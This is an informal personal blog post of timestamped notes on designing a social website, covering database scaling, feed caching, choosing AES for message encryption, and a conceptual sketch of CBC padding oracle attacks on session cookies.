Algorithms Everywhere. Probably Part I

0827: Issues with the database management: this was something I had not fully considered (although I had known of this issue because of the Zucc's CS50 Harvard lecture). The problem goes like this: You have say $N$ users, and on average to each of these $N$ users we can attribute $\sim N$ corresponding connections (could be social connections, posts, blah blah). So the complexity of the data would scale like $O(N^{2})$. However, we usually consider more complicated cases where we are not only considering posts, social connections (i.e. finding mutuals), which at that boils into a graph-short distance problem, which is Algorithms 101. The more complicated stuff usually involves the management of the heavier data (messages, pictures, videos, etc), for which fortunately there does exist a pretty good work-around by compressing the pictures on the client side (so to save resources on the server side because compressing tonnes of pictures and videos on the server at the rate of $N$ times average lowest data size say $M$ megabytes per second would suck the servers dry worse than the 634-in-a-day thing). There's another algorithms problem that arises with this, which is that on average some data is not always going to be retrieved from the database and will instead ``stay on the layer" so-to-speak, and what data is supposed to be available like this is an optimization problem. I could say for instance I want the feed to not refresh everytime a user logs in and basically keep a temporary log of what posts/stuff has been displayed the first time a user logs in. So if the user has lost data connection, it becomes easier to just display previous posts and say ``oops your data kinda sucks right now" (if you're using AT&T it sucked always) instead of throwing a BSOD and kind of shitting the atmosphere of the website. But we can't always just keep a track of every post a user has ever received, because (a) that is unbounded and a user could have procrastinated three weeks and spent 23 hours a day scrolling to hit like 50k posts or something which is too huge and (b) that's a thing that could fuck up with privacy. Or at least that's what I feel.

0836: Now here's the part that I am dreading. In order to implement messaging functionality, it is important to encrypt messages because I don't want John to know what Alice and Bob are talking about. My first thought is to go for a usual RSA cryptography algorithm where we have a primary key and a public key and we use prime factorization. But then again, but the thing is that RSA is a computationally expensive asymmetric algorithm and takes more time than something like AES, which is a symmetric algorithm and may be more suited for encryption of large data without compromising on encryption time. So I am considering using something like AES 256-bit encryption which seems to be a pretty good deal. Speaking of 256-bit encryption, it is funny how some brands market themselves saying they use ``military-grade encryption" and ``unbreakable encryption" all while basically doing AES and nothing more. Don't get me wrong, AES is incredibly efficient and ``unbreakable" in the sense of factorization time. But again, not functionally ``military grade" or some fancy shit, it is a very powerful encryption algorithm and not some hocus-pocus that the FBI made.

0856: To be clear: messages are not the only place where encryption is an issue. For that matter, even if you consider something as straightforward as cookies, you know well-enough how complicated this stuff is. The whole basis of cookies and storing session_id's is on the basis that the user cannot simply modify them. So you need to implement a good enough encryption algorithm for which CBC is usually the first option. Like the deal with CBC is that you are vulnerable to padded Oracle attacks, which are kind of fascinating because they rely on the very foundation of what CBC encryption modes do. Let me illustrate an example schematically.

You start with an initialization vector $X$, which for all CBC purposes is also the first index in the encryption schema. So you have something like $C_{0}=X$ (indices start from 0 so that the first block starts with index 1). We assume that for all valid purposes $X$ follows the usual CBC protocol and is truly random and contained. OK. Then, we start by taking the first plaintext $P_{i}$ and the first ciphertext (which is the initial encryption), and encrypt the XOR'd collection:

\[ C_{i}=\mathrm{En}\left( P_{i}\oplus C_{i-1} \right)\;, \]

and we generate the subsequent block chaining scheme. Decrypting is a similar process. However, while this may seem quite secure (which it kind of is), the Microsoft ASP.NET vulnerability clearly showed that this ``security" could be worked-around by using a padded oracle attack, where the attacker makes a series of requests to the oracle to understand the padding sequence in the block chain. I will leave the technical details with a link to a very good post by Ron Bowes that gives a concrete example of such an attack. But the essential idea is that breaking the padding ends up generating an error code, and you can tweak it to obtain information about the padding and the ciphertext, and as a result the plaintext. So, in such cases, the user can decrypt the session_id. This is an obvious example of subtle vulnerabilities that might go unnoticed, but it is necessary to have these in mind before making any security decision. And so on and so forth.

0959: An even more appealing overall class of problems in cryptography is that of P vs NP, which is an open problem with a lot of applications in cryptography. I will be posting in continuation to this post in a minute. Not that in general saying $P=NP$ is necessarily going to practically break unbreakable polynomial time based cryptography algorithms like RSA, but is nonetheless important. And not really relevant to our present problem. But that is kinda cool and it lets me make love to my 'Tism which is absolutely fun.

No comments:

Post a Comment